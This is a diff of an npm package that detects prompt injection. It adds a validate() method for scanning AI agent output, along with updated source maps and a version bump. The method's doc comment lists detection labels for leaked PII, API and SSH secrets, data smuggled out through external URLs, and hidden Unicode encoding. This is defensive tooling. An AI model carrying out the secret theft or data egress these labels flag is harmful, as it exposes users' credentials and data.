,CAAC;AAEhE,YAAY,EACV,aAAa,EACb,qBAAqB,EACrB,cAAc,EACd,iBAAiB,GAClB,MAAM,iBAAiB,CAAC;AAGzB,YAAY,EACV,YAAY,EACZ,UAAU,EACV,UAAU,EACV,SAAS,EACT,QAAQ,EACR,OAAO,EACP,UAAU,EACV,cAAc,EACd,kBAAkB,GACnB,MAAM,eAAe,CAAC;AAGvB,OAAO,EAAE,wBAAwB,EAAE,uBAAuB,EAAE,MAAM,2BAA2B,CAAC;AAC9F,YAAY,EAAE,6BAA6B,EAAE,MAAM,2BAA2B,CAAC;AAG/E,OAAO,EAAE,eAAe,EAAE,gBAAgB,EAAE,MAAM,EAAE,MAAM,qBAAqB,CAAC;AAEhF,OAAO,EAAE,cAAc,EAAE,MAAM,4BAA4B,CAAC;AAC5D,YAAY,EAAE,oBAAoB,EAAE,MAAM,4BAA4B,CAAC;AAGvE,OAAO,EAAE,WAAW,EAAE,MAAM,uCAAuC,CAAC;AACpE,YAAY,EAAE,kBAAkB,EAAE,MAAM,uCAAuC,CAAC;AAEhF,OAAO,EAAE,iBAAiB,EAAE,MAAM,8CAA8C,CAAC;AACjF,YAAY,EAAE,gBAAgB,EAAE,MAAM,8CAA8C,CAAC;AAErF,OAAO,EAAE,wBAAwB,EAAE,MAAM,wCAAwC,CAAC"}
+{"version":3,"file":"index.d.ts","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"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"}

package/dist/index.js

@@ -133,6 +133,41 @@ export class Tracerney {
     async scanPrompt(prompt) {
         return this.service.scanPrompt(prompt);
     }
+    /**
+     * Layer 1: Scan any string (agent output, tool result, raw text) for suspicious content.
+     *
+     * The SDK is a high-precision sensor — it never decides for you.
+     * Every match is returned as a SuspiciousTrace with a label and pre-computed redactedContent.
+     * You choose the reaction.
+     *
+     * **The Suspicious Manifest:**
+     * | Label                  | Trigger              | Recommended Action |
+     * |------------------------|----------------------|--------------------|
+     * | `SUSPICIOUS_PII`       | Email / Phone        | Usually Redact     |
+     * | `SUSPICIOUS_SECRET`    | API keys / SSH       | Usually Block      |
+     * | `SUSPICIOUS_EGRESS`    | External URL smuggle | Always Block       |
+     * | `SUSPICIOUS_ENCODING`  | Zero-width / BiDi    | Audit / Block      |
+     *
+     * @example
+     * ```typescript
+     * const trace = tracerney.validate(agentOutput);
+     *
+     * if (trace.isSuspicious) {
+     *   console.log(`Alert [${trace.label}]: ${trace.reason}`);
+     *
+     *   // Option A: Hard block
+     *   if (trace.label === 'SUSPICIOUS_EGRESS') {
+     *     throw new Error('Security Policy Violation');
+     *   }
+     *
+     *   // Option B: Surgical scrub
+     *   return trace.redactedContent;
+     * }
+     * ```
+     */
+    validate(text) {
+        return this.service.validate(text);
+    }
     /**
      * Update allowed tools at runtime
      *
@@ -165,6 +200,9 @@ export { BundledPatternRepository, RemotePatternRepository } from './infrastruct
 // Utility exports (for middleware & advanced use)
 export { normalizePrompt, normalizePrompts, jitter } from './application/utils/index.js';
 export { HttpSignalSink } from './infrastructure/telemetry/index.js';
+// Layer 1 Deterministic Filter exports
+export { DeterministicFilter } from './domain/pii/DeterministicFilter.js';
+export { PII_PATTERNS } from './domain/pii/PIIPattern.js';
 // Layer 2 Sentinel exports
 export { LLMSentinel } from './infrastructure/sentinel/LLMSentinel.js';
 export { HttpShadowLogSink } from './infrastructure/telemetry/HttpShadowLogSink.js';

package/dist/index.js.map

@@ -1 +1 @@
-{"version":3,"file":"index.js","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"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"}
+{"version":3,"file":"index.js","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"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"}

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "@sandrobuilds/tracerney",
-  "version": "0.9.22",
+  "version": "0.9.24",
   "description": "Lightweight prompt injection detection with Layer 1 (258 patterns) + Layer 2 (AI verification). Runs locally with zero data storage. Upgrade to Pro for context-aware threat analysis at tracerney.com",
   "type": "module",
   "main": "dist/index.js",